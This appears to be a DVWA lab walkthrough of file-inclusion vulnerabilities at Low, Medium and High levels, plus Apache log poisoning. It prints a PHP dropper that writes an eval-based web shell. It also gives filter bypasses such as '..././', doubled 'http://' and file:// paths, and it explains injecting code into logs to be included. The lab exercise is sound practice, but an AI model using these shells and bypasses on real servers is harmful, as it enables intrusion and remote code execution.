Table of contents
The middleware log file contains
Low
code analysis
The parameter page is passed in directly without any filtering
exploit
First upload a Trojan horse with writing function at the file upload place, either .txt or .php
<?PHP
fputs(fopen('shell.php','w'),'<?php eval($_POST[pass])?>');
?>
Then copy the path and use directory traversal to resolve the Trojan we just uploaded
No error is reported, the code executes successfully
The file contains more shell.php in the directory
Connect using Ant Sword
Medium
code analysis
http(s)://, ../, ..\\ are filtered, and keywords can be double-written to bypass
exploit
Put ../=>..././ to bypass
You can bypass http://=>hthttp://tp://
The shell.php file was successfully generated
High
code analysis
Use the fnmatch function to match files starting with file, we can use the file:// pseudo-protocol to bypass
exploit
file:// pseudo-protocol followed by the absolute path to the file
Executed successfully without error
The middleware log file contains
Taking Apache as an example here, every successful access record will be recorded under access.log, and the record of failed access will be recorded under error.log. DVWA logs are in the following path:
Add malicious code to the access path
The code found in the log is encoded
Use burp suite to capture packets and restore them
At this time, check the log file again and find that the malicious code has been successfully written into the log file
At this time, use the file to contain the vulnerability, and the directory traversal to include the log file
You can also use <?php phpinfo();?> to write to the log and then access
Code parsed successfully